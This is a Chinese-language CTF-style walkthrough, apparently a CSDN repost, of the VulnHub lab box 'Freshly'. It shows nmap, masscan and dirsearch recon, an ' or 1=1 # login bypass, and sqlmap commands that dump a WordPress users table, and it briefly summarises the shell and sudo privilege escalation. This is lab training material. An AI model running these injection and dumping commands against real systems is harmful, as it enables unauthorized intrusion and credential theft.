Freshly 靶机 实战

0x00 环境搭建

  • 下载链接
    https://download.vulnhub.com/tophatsec/Freshly.ova
  • 运行环境

该靶机 安装在VM上 无法启动

故将靶机安装在 Virtualbox 上 网卡 配置桥接win10网卡 192.168.1.100

攻击机 kali 在VMware上 也配置上桥接win10网卡 192.168.1.105

攻击机 win10 192.168.1.103

0x01 信息收集

ip探测

	 netdiscover -i eth1 -r 192.168.1.0/24

在这里插入图片描述

端口和服务识别

	masscan -p 1-65525 --rate=1000 192.168.1.100

	nmap -sC -sV -A -p 80 192.168.1.100 -o port.txt

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

OS details: Linux 3.2 - 4.9

(后来 从80端口 无法获取到shell后 查看 别人的解题思路,才发现 原来是从8080端口的wordpress获取的,但我下载的这个靶机,8080端口,443端口 都 没有起来,看后边也比较简单 就是利用wordpress 的cms 漏洞 获取shell 然后直接 sudo su 密码 也为wordpress 后台登录密码)

0x02 漏洞挖掘

web漏洞思路

(1)访问主页。点击各个功能点 进行测试。查看源码
(2)枚举目录,点开测试 可用扫描器 或手工。看是否是cms等。

步骤一:浏览网页 爆破目录

(1)使用 dirsearch 爆破

python3 dirsearch.py -u "http://192.168.1.100" -e "*"

爆破出 login.php /phpmyadmin

(2) 访问 login.php
一处登录框,尝试sql注入、 暴力破解 xss 等漏洞。
123 123 返回0
’ or 1=1 # 123 返回1
说明 万能密码登录成功,存在sql注入

sqlmap -r sql.txt --level 3 --batch --dbs

存在时间盲注 以及 其他库名
在这里插入图片描述

sqlmap -r sql.txt --batch --level 3 -D wordpress8080 -T users -C password,username --dump
在这里插入图片描述
( 从80端口 无法获取到shell后 查看 别人的解题思路,才发现 原来是从8080端口的wordpress获取的,但我下载的这个靶机,8080端口,443端口 都 没有起来,看后边也比较简单 就是利用wordpress 的cms 漏洞 获取shell 然后直接 sudo su 密码 也为wordpress 后台登录密码)

0x03 总结

该靶场比较简单 sql注入 爆出 另一个web服务 wordpress的 账号密码,登录后台后 利用已知的cms漏洞获取shell。 sudo su 提权时 密码用 wordpress 后台密码尝试后 正确。

配置靶场时 出现只启动了 80端口,nmap 只能扫出80,telnet 8080 也不通 。 因靶场也比较简单 就 没有在尝试了。

おすすめ

転載: blog.csdn.net/YouthBelief/article/details/121661136